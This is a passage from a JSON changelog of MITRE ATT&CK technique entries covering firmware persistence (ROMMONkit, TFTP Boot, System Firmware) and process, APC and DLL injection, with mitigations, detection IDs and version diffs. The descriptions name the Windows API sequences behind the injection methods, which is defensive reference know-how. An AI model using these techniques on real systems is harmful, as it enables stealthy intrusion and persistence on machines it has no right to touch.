                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:49.538000+00:00\", \"old_value\": \"2025-10-24 17:48:59.147000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"ITWorld Hard Disk Health Dec 2014\", \"description\": \"Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024.\", \"url\": \"https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html\"}, \"root['external_references'][2]\": {\"source_name\": \"SanDisk SMART\", \"description\": \"SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.\"}, \"root['external_references'][3]\": {\"source_name\": \"SmartMontools\", \"description\": \"smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.\", \"url\": \"https://www.smartmontools.org/\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0323: Detection Strategy for T1542.002 Pre-OS Boot: Component Firmware"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-20 00:05:48.790000+00:00",
                    "modified": "2026-04-17 18:38:49.551000+00:00",
                    "name": "ROMMONkit",
                    "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542/004",
                            "external_id": "T1542.004"
                        },
                        {
                            "source_name": "Cisco Synful Knock Evolution",
                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:49.551000+00:00\", \"old_value\": \"2025-10-24 17:49:11.524000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1031: Network Intrusion Prevention",
                            "M1046: Boot Integrity",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0175: Detection Strategy for T1542.004 Pre-OS Boot: ROMMONkit"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-12-19 19:43:34.507000+00:00",
                    "modified": "2026-04-17 18:38:49.546000+00:00",
                    "name": "System Firmware",
                    "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542/001",
                            "external_id": "T1542.001"
                        },
                        {
                            "source_name": "About UEFI",
                            "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.",
                            "url": "http://www.uefi.org/about"
                        },
                        {
                            "source_name": "Wikipedia UEFI",
                            "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.",
                            "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface"
                        },
                        {
                            "source_name": "Wikipedia BIOS",
                            "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.",
                            "url": "https://en.wikipedia.org/wiki/BIOS"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jean-Ian Boutin, ESET",
                        "McAfee",
                        "Ryan Becwar"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:49.546000+00:00\", \"old_value\": \"2025-10-24 17:48:26.714000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"McAfee CHIPSEC Blog\", \"description\": \"Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.\", \"url\": \"https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/\"}, \"root['external_references'][2]\": {\"source_name\": \"MITRE Copernicus\", \"description\": \"Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.\", \"url\": \"http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about\"}, \"root['external_references'][3]\": {\"source_name\": \"Intel HackingTeam UEFI Rootkit\", \"description\": \"Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.\", \"url\": \"https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html\"}, \"root['external_references'][4]\": {\"source_name\": \"Github CHIPSEC\", \"description\": \"Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.\", \"url\": \"https://github.com/chipsec/chipsec\"}, \"root['external_references'][6]\": {\"source_name\": \"MITRE Trustworthy Firmware Measurement\", \"description\": \"Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.\", \"url\": \"http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1046: Boot Integrity",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0099: Detection Strategy for T1542.001 Pre-OS Boot: System Firmware"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-20 00:06:56.180000+00:00",
                    "modified": "2026-04-17 18:38:49.555000+00:00",
                    "name": "TFTP Boot",
                    "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542/005",
                            "external_id": "T1542.005"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:49.555000+00:00\", \"old_value\": \"2025-10-24 17:48:33.317000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Secure Boot\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#35\"}, \"root['external_references'][3]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Image File Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#7\"}, \"root['external_references'][4]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Run-Time Memory Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#13\"}, \"root['external_references'][5]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Command History\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#23\"}, \"root['external_references'][6]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Boot Information\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#26\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1028: Operating System Configuration",
                            "M1031: Network Intrusion Prevention",
                            "M1035: Limit Access to Resource Over Network",
                            "M1046: Boot Integrity",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0582: Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:47.843000+00:00",
                    "modified": "2026-04-15 22:26:41.663000+00:00",
                    "name": "Process Injection",
                    "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055",
                            "external_id": "T1055"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Anastasios Pingios",
                        "Christiaan Beek, @ChristiaanBeek",
                        "Ryan Becwar"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:26:41.663000+00:00\", \"old_value\": \"2025-10-24 17:48:43.053000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"GNU Acct\", \"description\": \"GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.\", \"url\": \"https://www.gnu.org/software/acct/\"}, \"root['external_references'][2]\": {\"source_name\": \"Elastic Process Injection July 2017\", \"description\": \"Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.\", \"url\": \"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\"}, \"root['external_references'][3]\": {\"source_name\": \"RHEL auditd\", \"description\": \"Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.\", \"url\": \"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing\"}, \"root['external_references'][4]\": {\"source_name\": \"ArtOfMemoryForensics\", \"description\": \"Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft Sysmon v6 May 2017\", \"description\": \"Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.\", \"url\": \"https://docs.microsoft.com/sysinternals/downloads/sysmon\"}, \"root['external_references'][6]\": {\"source_name\": \"Chokepoint preload rootkits\", \"description\": \"stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.\", \"url\": \"http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0508: Behavioral Detection of Process Injection Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:29:43.786000+00:00",
                    "modified": "2026-04-15 22:26:41.151000+00:00",
                    "name": "Asynchronous Procedure Call",
                    "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/004",
                            "external_id": "T1055.004"
                        },
                        {
                            "source_name": "CyberBit Early Bird Apr 2018",
                            "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.",
                            "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/"
                        },
                        {
                            "source_name": "ENSIL AtomBombing Oct 2016",
                            "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.",
                            "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows"
                        },
                        {
                            "source_name": "Microsoft Atom Table",
                            "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx"
                        },
                        {
                            "source_name": "Microsoft APC",
                            "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:26:41.151000+00:00\", \"old_value\": \"2025-10-24 17:49:00.298000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"Elastic Process Injection July 2017\", \"description\": \"Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.\", \"url\": \"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0100: Behavioral Detection of Asynchronous Procedure Call (APC) Injection via Remote Thread Queuing"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:26:08.145000+00:00",
                    "modified": "2026-04-15 22:26:57.009000+00:00",
                    "name": "Dynamic-link Library Injection",
                    "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's <code>AddressOfEntryPoint</code> before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/001",
                            "external_id": "T1055.001"
                        },
                        {
                            "source_name": "Hiding Malicious Code with Module Stomping",
                            "description": "Aliz Hammond. (2019, August 15). Hiding Malicious Code with \"Module Stomping\": Part 1. Retrieved July 14, 2022.",
                            "url": "https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/"
                        },
                        {
                            "source_name": "Elastic HuntingNMemory June 2017",
                            "description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/hunting-memory"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        },
                        {
                            "source_name": "Module Stomping for Shellcode Injection",
                            "description": "Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.",
                            "url": "https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Boominathan Sundaram"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:26:57.009000+00:00\", \"old_value\": \"2025-10-24 17:49:36.680000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
